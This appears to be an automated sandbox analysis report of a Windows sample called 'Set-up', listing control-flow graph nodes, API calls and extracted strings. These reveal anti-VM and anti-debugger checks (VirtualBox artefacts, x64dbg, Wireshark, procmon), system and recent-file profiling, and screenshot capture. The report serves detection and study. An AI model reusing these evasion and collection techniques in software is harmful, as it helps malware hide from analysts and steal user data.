a76fd4 86881->86882 86883 a76feb 86881->86883 86882->86883 86885 a7701b 86882->86885 86884 a70847 86883->86884 86886 a77186 WSASetLastError 86883->86886 86887 a76fff Sleep 86883->86887 86884->86864 86884->86865 86884->86874 86888 a77176 86885->86888 86889 a771aa 86885->86889 86886->86884 86887->86884 86893 a77207 select 86888->86893 86890 a7730b 86889->86890 86891 a77331 WSASetLastError 86889->86891 86892 a771cc Sleep 86889->86892 86890->86884 86894 a77312 WSAGetLastError 86890->86894 86891->86884 86891->86890 86892->86884 86895 a771ec 86892->86895 86893->86890 86899 a77233 86893->86899 86894->86884 86895->86894 86896 a7726b __WSAFDIsSet 86897 a7729a __WSAFDIsSet 86896->86897 86896->86899 86898 a772ba __WSAFDIsSet 86897->86898 86897->86899 86898->86899 86899->86884 86899->86896 86899->86897 86899->86898 86900->86855 86901->86855 86902->86856 86903->86854 86904->86877 86905 a98b50 86906 a98b6b 86905->86906 86943 a98be6 86905->86943 86907 a98b8f 86906->86907 86908 a98bf3 86906->86908 86906->86943 87037 a76e40 11 API calls 86907->87037 86944 a9a550 86908->86944 86912 a98ba1 86914 a98cd9 SleepEx getsockopt 86912->86914 86918 a98c99 86912->86918 86932 a98bb5 86912->86932 86913 a98ccf 86917 a98e85 86913->86917 86919 a9a150 29 API calls 86913->86919 86913->86943 86915 a98d18 WSAGetLastError 86914->86915 86916 a98d22 86914->86916 86915->86916 86916->86913 86923 a98d43 86916->86923 86924 a98eae 86917->86924 86917->86943 87044 a72a00 fwrite strlen memset strlen 86917->87044 86918->86914 86920 a98cb2 86918->86920 86925 a98dff WSASetLastError 86919->86925 86920->86913 87039 a9b180 SleepEx getsockopt WSAGetLastError 86920->87039 86921 a98c1f connect 86922 a98c35 WSAGetLastError 86921->86922 86926 a9a150 29 API calls 86922->86926 86933 a9a150 29 API calls 86923->86933 86924->86943 87045 a678b0 closesocket 86924->87045 86925->86917 86928 a98e1b 86925->86928 86940 a98c4d 86926->86940 86928->86917 87042 a7d090 20 API calls 86928->87042 86931 a98c8b 86931->86918 86934 a98dc8 86931->86934 86937 a98d66 86932->86937 86932->86943 86933->86937 87041 a9b100 22 API calls 86934->87041 86937->86943 87040 aa50a0 strlen memset strlen fwrite fwrite 86937->87040 86938 a98e67 87043 aa4fd0 strlen memset strlen fwrite fwrite 86938->87043 86940->86931 87038 aa50a0 strlen memset strlen fwrite fwrite 86940->87038 86945 a9a575 86944->86945 86948 a9a597 86945->86948 87050 a675e0 86945->87050 86947 a9a6d9 86949 a9a709 86947->86949 86967 a9a713 86947->86967 87066 a72a00 fwrite strlen memset strlen 86947->87066 86948->86947 86950 a9ef30 5 API calls 86948->86950 86951 a678b0 5 API calls 86949->86951 86949->86967 86954 a9a63a 86950->86954 86951->86967 86952 a98bfc 86952->86913 86952->86921 86952->86922 86952->86943 86955 a9a69b _errno _errno _errno 86954->86955 86956 a9a641 86954->86956 87064 a7d090 20 API calls 86955->87064 86957 a9a650 setsockopt 86956->86957 86960 a9a683 86956->86960 86959 a9a7e5 86957->86959 86957->86960 86965 a9a802 86959->86965 86974 a9a8ee 86959->86974 86960->86959 87068 aa4fd0 strlen memset strlen fwrite fwrite 86960->87068 86961 a9a6c9 87065 aa4f40 6 API calls 86961->87065 86966 a9a811 setsockopt 86965->86966 86978 a9a87c 86965->86978 86970 a9a83b 86966->86970 86966->86978 86967->86952 87067 aa50a0 strlen memset strlen fwrite fwrite 86967->87067 86968 a9a8df 86986 a9a94c 86968->86986 87071 a9b1e0 12 API calls 86968->87071 86969 a9a962 getsockopt 86971 a9a991 setsockopt 86969->86971 86972 a9a984 86969->86972 86970->86978 86979 a9a854 WSAGetLastError 86970->86979 86971->86986 86972->86971 86972->86986 86973 a9ac20 getsockopt 86975 a9ac4f setsockopt 86973->86975 86976 a9ac42 86973->86976 86974->86969 86974->86986 86975->86968 86976->86968 86976->86975 86978->86968 86978->86973 87069 a7d090 20 API calls 86979->87069 86980 a9af41 87063 ac67e0 ioctlsocket 86980->87063 86983 a9a86d 87070 aa4fd0 strlen memset strlen fwrite fwrite 86983->87070 86985 a9af56 86987 a9afb9 WSAGetLastError 86985->86987 86988 a9af5d 86985->86988 86986->86947 86986->86980 86989 a9ab0a strlen 86986->86989 86990 a9abe1 86986->86990 86987->86947 86988->86967 86991 a9a150 29 API calls 86988->86991 86989->86990 86997 a9ab22 86989->86997 86992 a9abee 86990->86992 86993 a9aed3 htons 86990->86993 86991->86967 86994 a9aeeb bind 86992->86994 86995 a9abf9 htons 86992->86995 86993->86994 87003 a9afcf 86994->87003 87005 a9af03 86994->87005 86996 a9ac0c 86995->86996 86996->86994 86998 a9abb9 86997->86998 87000 a9acb8 86997->87000 87001 a9ae32 86997->87001 87007 a9ad45 86998->87007 87011 a9adea WSAGetLastError 86998->87011 87032 a9adc5 86998->87032 87073 a96be0 66 API calls 86998->87073 86999 a9b056 WSAGetLastError 87082 a7d090 20 API calls 86999->87082 87000->86947 87000->86998 87018 a9acdc WSAGetLastError 87000->87018 87001->86998 87078 aa4fd0 strlen memset strlen fwrite fwrite 87001->87078 87002 a9af33 87002->86980 87003->86999 87008 a9aff8 htons bind 87003->87008 87081 aa4fd0 strlen memset strlen fwrite fwrite 87003->87081 87005->87002 87080 aa4fd0 strlen memset strlen fwrite fwrite 87005->87080 87015 a9ad5f 87007->87015 87016 a9ade6 87007->87016 87008->87003 87008->87005 87009 a9b07b 87083 aa4f40 6 API calls 87009->87083 87076 a7d090 20 API calls 87011->87076 87012 a9aeb8 87079 ac45c0 12 API calls 87012->87079 87013 a9ae8e 87013->86994 87020 a9ae93 strchr 87013->87020 87034 a9adb7 87015->87034 87074 aa4fd0 strlen memset strlen fwrite fwrite 87015->87074 87016->87011 87072 a7d090 20 API calls 87018->87072 87025 a9aead 87020->87025 87022 a9b08b 87022->86947 87084 ac45c0 12 API calls 87025->87084 87026 a9ad01 87077 aa4f40 6 API calls 87026->87077 87027 a9aecc 87027->86993 87027->86994 87032->86947 87032->87012 87032->87013 87033 a9b0bf 87033->86996 87035 a9b0ca htons 87033->87035 87075 ab3030 fwrite strlen memset strlen 87034->87075 87035->86996 87036 a9b0e5 strtoul 87035->87036 87036->86996 87037->86912 87038->86931 87039->86913 87040->86943 87041->86913 87042->86938 87043->86917 87044->86924 87046 a678c5 87045->87046 87047 a678dc 87045->87047 87088 a672a0 fwrite strlen memset strlen 87046->87088 87047->86943 87049 a678d7 87049->87047 87051 a67607 socket 87050->87051 87052 a675ef 87050->87052 87053 a6763f 87051->87053 87054 a6762b 87051->87054 87052->87051 87055 a67643 87052->87055 87056 a67601 87052->87056 87053->86948 87085 a672a0 fwrite strlen memset strlen 87054->87085 87086 a672a0 fwrite strlen memset strlen 87055->87086 87056->87051 87058 a6763a 87058->87053 87060 a67654 __acrt_iob_func 87087 a6cb20 32 API calls 87060->87087 87062 a67674 fflush _errno 87062->86948 87063->86985 87064->86961 87065->86947 87066->86949 87067->86952 87068->86959 87069->86983 87070->86978 87071->86986 87072->87026 87073->87007 87074->87034 87075->87032 87076->87026 87077->86947 87078->86998 87079->87027 87080->87002 87081->87003 87082->87009 87083->87022 87084->87033 87085->87058 87086->87060 87087->87062 87088->87049 87089 a6255d 87090 de9f70 87089->87090 87091 a6256c GetSystemInfo 87090->87091 87092 f3e330 malloc 87091->87092 87093 a62589 87092->87093 87094 f3e520 12 API calls 87093->87094 87095 a625a0 GlobalMemoryStatusEx 87094->87095 87096 f3e330 malloc 87095->87096 87097 a625ec 87096->87097 87098 f3e520 12 API calls 87097->87098 87099 a62603 GetLogicalDriveStringsA 87098->87099 87100 a62626 87099->87100 87101 a6277c 87099->87101 87102 f3e130 2 API calls 87100->87102 87104 f3e330 malloc 87101->87104 87103 a6262b 87102->87103 87106 a62762 87103->87106 87107 a6263c GetDriveTypeA 87103->87107 87105 a627bf 87104->87105 87108 f3e520 12 API calls 87105->87108 87111 f3e520 12 API calls 87106->87111 87109 a62655 GetDiskFreeSpaceExA 87107->87109 87110 a62743 strlen 87107->87110 87112 a627d6 KiUserCallbackDispatcher 87108->87112 87109->87110 87131 a6268b 87109->87131 87110->87103 87111->87101 87114 a627f8 87112->87114 87115 f3e330 malloc 87114->87115 87117 a62809 87115->87117 87118 f3e520 12 API calls 87117->87118 87119 a62820 87118->87119 87121 f3e330 malloc 87119->87121 87120 f3e220 malloc 87120->87131 87122 a6282b 87121->87122 87124 f3e520 12 API calls 87122->87124 87123 f3e520 12 API calls 87123->87131 87125 a62842 SHGetKnownFolderPath wcscpy wcscat FindFirstFileW 87124->87125 87126 a62906 FindNextFileW 87125->87126 87127 a62928 87125->87127 87126->87126 87126->87127 87128 f3e330 malloc 87127->87128 87129 a6293d 87128->87129 87130 f3e520 12 API calls 87129->87130 87132 a62954 K32EnumProcesses 87130->87132 87131->87110 87131->87120 87131->87123 87142 f3e400 7 API calls 87131->87142 87143 f3e490 strlen 87131->87143 87133 a6297b 87132->87133 87137 a629a9 87132->87137 87134 f3e330 malloc 87133->87134 87135 a62992 87134->87135 87136 f3e520 12 API calls 87135->87136 87136->87137 87138 f3e330 malloc 87137->87138 87139 a629e0 87138->87139 87140 f3e520 12 API calls 87139->87140 87141 a629f7 87140->87141 87142->87131
                          APIs
                            • Part of subcall function 00A7D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00A701B1), ref: 00A7D8E2
                          • setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 00A9A670
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A6A1
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A6AB
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A6AF
                            • Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D0A1
                            • Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0A9
                            • Part of subcall function 00A7D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0CD
                            • Part of subcall function 00A7D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0D7
                            • Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00A7D381
                            • Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00A7D3A2
                            • Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D3BF
                            • Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D3C9
                            • Part of subcall function 00A7D090: SetLastError.KERNEL32(00000000), ref: 00A7D3D4
                            • Part of subcall function 00AA4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00AA4F9E
                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00A9A831
                          • WSAGetLastError.WS2_32 ref: 00A9A854
                          • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00A9A97A
                          • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00A9A9A6
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A9AB0F
                          • htons.WS2_32(?), ref: 00A9AC01
                          • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00A9AC38
                          • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00A9AC64
                          • WSAGetLastError.WS2_32 ref: 00A9ACDC
                          • WSAGetLastError.WS2_32 ref: 00A9ADF5
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 00A9AE9D
                          • htons.WS2_32(?), ref: 00A9AEDB
                          • bind.WS2_32(?,00000002,00000010), ref: 00A9AEF5
                          • WSAGetLastError.WS2_32 ref: 00A9AFB9
                          • htons.WS2_32(?), ref: 00A9AFFC
                          • bind.WS2_32(?,?,?), ref: 00A9B014
                          • WSAGetLastError.WS2_32 ref: 00A9B056
                          • htons.WS2_32(?), ref: 00A9B0D2
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 00A9B0EA
                          Strings
                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 00A9AE1F
                          • Could not set TCP_NODELAY: %s, xrefs: 00A9A871
                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 00A9ADAC
                          • cf-socket.c, xrefs: 00A9A5CD, 00A9A735
                          • Trying %s:%d..., xrefs: 00A9A7C2, 00A9A7DE
                          • @, xrefs: 00A9A8F4
                          • Bind to local port %d failed, trying next, xrefs: 00A9AFE5
                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00A9A6CE
                          • Local port: %hu, xrefs: 00A9AF28
                          • cf_socket_open() -> %d, fd=%d, xrefs: 00A9A796
                          • Trying [%s]:%d..., xrefs: 00A9A689
                          • bind failed with errno %d: %s, xrefs: 00A9B080
                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00A9AD0A
                          • @, xrefs: 00A9AC42
                          • Local Interface %s is ip %s using address family %i, xrefs: 00A9AE60
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                          • API String ID: 2815861332-2373386790
                          • Opcode ID: 17ec5736f00ce3e99a77aaa3d3caaa9d7e654f276afc55a7c743f55dd7b7d77c
                          • Instruction ID: 7a70b5faf2d586b51620a1d5603675e6e19ade2e504953add5ab21c4159e7e2b
                          • Opcode Fuzzy Hash: 17ec5736f00ce3e99a77aaa3d3caaa9d7e654f276afc55a7c743f55dd7b7d77c
                          • Instruction Fuzzy Hash: 1062F271604340AFEB20CF24D846BAAB7F4BF95314F04451AF9899B292E771E945CBD3

                          Control-flow Graph

                          APIs
                          • FindFirstFileA.KERNELBASE ref: 00A62A27
                          • RegOpenKeyExA.KERNELBASE ref: 00A62A8A
                          • CharUpperA.USER32 ref: 00A62AEF
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62B05
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A62B6D
                          • Process32First.KERNEL32 ref: 00A62B88
                          • Process32Next.KERNEL32 ref: 00A62BC0
                          • QueryFullProcessImageNameA.KERNELBASE ref: 00A62C26
                          • CloseHandle.KERNELBASE ref: 00A62C49
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62C5F
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A62CC4
                          • Process32First.KERNEL32 ref: 00A62CDF
                          • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A62D0D
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D42
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D5C
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D76
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D90
                          • Process32Next.KERNEL32 ref: 00A62DBF
                          • CloseHandle.KERNELBASE ref: 00A62DFC
                          • EnumWindows.USER32 ref: 00A62E21
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
                          • String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
                          • API String ID: 515599682-3783588604
                          • Opcode ID: 56428874004b4fe8be8398aefacdeda0798c4272a71bf9570726f8ced7025580
                          • Instruction ID: 897ce2d4572b9d5d5e01865e8c5fa9c47d19f6b37557da519e734ec9c2d857a6
                          • Opcode Fuzzy Hash: 56428874004b4fe8be8398aefacdeda0798c4272a71bf9570726f8ced7025580
                          • Instruction Fuzzy Hash: D9E1F3B09057099FDB10EF68DA8579DBBF4AF48304F008869E888DB345E779D988DF52

                          Control-flow Graph

                          APIs
                          • GetSystemInfo.KERNELBASE ref: 00A62579
                            • Part of subcall function 00F3E330: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00A62589), ref: 00F3E345
                          • GlobalMemoryStatusEx.KERNELBASE ref: 00A625CC
                          • GetLogicalDriveStringsA.KERNEL32 ref: 00A62619
                          • GetDriveTypeA.KERNELBASE ref: 00A62647
                          • GetDiskFreeSpaceExA.KERNELBASE ref: 00A6267E
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A62749
                          • KiUserCallbackDispatcher.NTDLL ref: 00A627E2
                          • SHGetKnownFolderPath.SHELL32 ref: 00A6286D
                          • wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A628BE
                          • wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A628D4
                          • FindFirstFileW.KERNELBASE ref: 00A628F8
                          • FindNextFileW.KERNELBASE ref: 00A6291F
                          • K32EnumProcesses.KERNEL32 ref: 00A6296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
                          • String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
                          • API String ID: 2116500361-3337672980
                          • Opcode ID: 4a2092e1115e08b1b7ff66f36514571b3fe129c925801a8848330904d4a0cc20
                          • Instruction ID: 2e09e3060074aad7a77a6e02bfc3efdb2a94453af739837f9fa6388c0d919fce
                          • Opcode Fuzzy Hash: 4a2092e1115e08b1b7ff66f36514571b3fe129c925801a8848330904d4a0cc20
                          • Instruction Fuzzy Hash: 12D1C3B49057099FCB10EF68D98569EBBF0BF48314F00896DE498D7341E7359A84DF52

                          Control-flow Graph

                          APIs
                          • LoadLibraryA.KERNEL32 ref: 00DF8DDF
                          • GetProcAddress.KERNEL32 ref: 00DF8E03
                          • GetProcAddress.KERNEL32 ref: 00DF8E19
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF8FFF
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9020
                          • FreeLibrary.KERNEL32 ref: 00DF9028
                            • Part of subcall function 00DF7E20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF7E6D
                            • Part of subcall function 00DF7E20: wcscmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DF7EB6
                            • Part of subcall function 00DF7E20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF7ED8
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF90A7
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF90C8
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF90DF
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9100
                          • FreeLibrary.KERNEL32 ref: 00DF9108
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9127
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9148
                          • FreeLibrary.KERNEL32 ref: 00DF9150
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: Library__acrt_iob_funcfwrite$Free$AddressProc$Loadfreemallocwcscmp
                          • String ID: !$Failed to allocate buffer$Failed to create GDI+ bitmap$Failed to get JPEG encoder CLSID$Failed to load GDI+ functions$Failed to load gdiplus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToStream$gdiplus.dll$image/jpeg
                          • API String ID: 4185073593-1943330374
                          • Opcode ID: 56f1c275b2eb5904c1bbb0cd2e6b5931f93f38980fe6ab3931b4f65dfb42de54
                          • Instruction ID: 7366b0e25bc3af25cf6ab88663e03fa14100cdd0da2fbbc003bc16005a97cbe0
                          • Opcode Fuzzy Hash: 56f1c275b2eb5904c1bbb0cd2e6b5931f93f38980fe6ab3931b4f65dfb42de54
                          • Instruction Fuzzy Hash: FB5116B08093089FD710AF29D44936EBBF0FF45314F11886DE9C89B246DB7A9885DF62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 950 b2aa30-b2aa64 952 b2ab04-b2ab09 950->952 953 b2aa6a-b2aaa7 call b1e730 950->953 955 b2ae80-b2ae89 952->955 957 b2aaa9-b2aabd 953->957 958 b2ab0e-b2ab13 953->958 959 b2ab18-b2ab50 htons 957->959 960 b2aabf-b2aac7 957->960 961 b2ae2e 958->961 963 b2ab58-b2ab6d 959->963 960->961 962 b2aacd-b2ab02 htons 960->962 964 b2ae30-b2ae4a call b1ea60 call b1ebf0 961->964 962->963 965 b2ab96-b2abab socket 963->965 966 b2ab6f-b2ab73 963->966 979 b2ae75-b2ae7d 964->979 980 b2ae4c-b2ae57 964->980 965->961 969 b2abb1-b2abc5 965->969 966->965 970 b2ab75-b2ab8f 966->970 972 b2abd0-b2abed ioctlsocket 969->972 973 b2abc7-b2abca 969->973 970->969 986 b2ab91 970->986 976 b2ac10-b2ac14 972->976 977 b2abef-b2ac0a setsockopt 972->977 973->972 975 b2ad2e-b2ad39 973->975 981 b2ad52-b2ad56 975->981 982 b2ad3b-b2ad4c 975->982 984 b2ac16-b2ac31 setsockopt 976->984 985 b2ac37-b2ac41 976->985 977->976 983 b2ae29 977->983 979->955 987 b2ae59-b2ae5e 980->987 988 b2ae6e-b2ae6f closesocket 980->988 981->983 989 b2ad5c-b2ad6b 981->989 982->981 982->983 983->961 984->983 984->985 990 b2ac43-b2ac46 985->990 991 b2ac7a-b2ac7e 985->991 986->961 987->988 992 b2ae60-b2ae6c 987->992 988->979 994 b2ad70-b2ad78 989->994 995 b2ad04-b2ad08 990->995 996 b2ac4c-b2ac51 990->996 998 b2ac80-b2ac9b 991->998 999 b2ace7-b2acfe setsockopt 991->999 992->979 1001 b2ada0-b2adad connect 994->1001 1002 b2ad7a-b2ad7f 994->1002 995->975 1000 b2ad0a-b2ad28 setsockopt 995->1000 996->995 1003 b2ac57-b2ac78 htonl 996->1003 998->999 1004 b2ac9d-b2acc1 998->1004 999->995 1000->975 1000->983 1008 b2adb3-b2adcf WSAGetLastError 1001->1008 1002->1001 1006 b2ad81-b2ad99 1002->1006 1007 b2acc6-b2acd7 bind 1003->1007 1004->1007 1006->1008 1007->983 1011 b2acdd-b2ace5 1007->1011 1009 b2add5-b2add8 1008->1009 1010 b2ae8a-b2ae91 1008->1010 1012 b2ade1-b2adf1 1009->1012 1013 b2adda-b2addf 1009->1013 1010->964 1011->995 1011->999 1015 b2adf3-b2ae07 1012->1015 1016 b2ae0d-b2ae12 1012->1016 1013->994 1013->1012 1015->1016 1021 b2aea8-b2aead 1015->1021 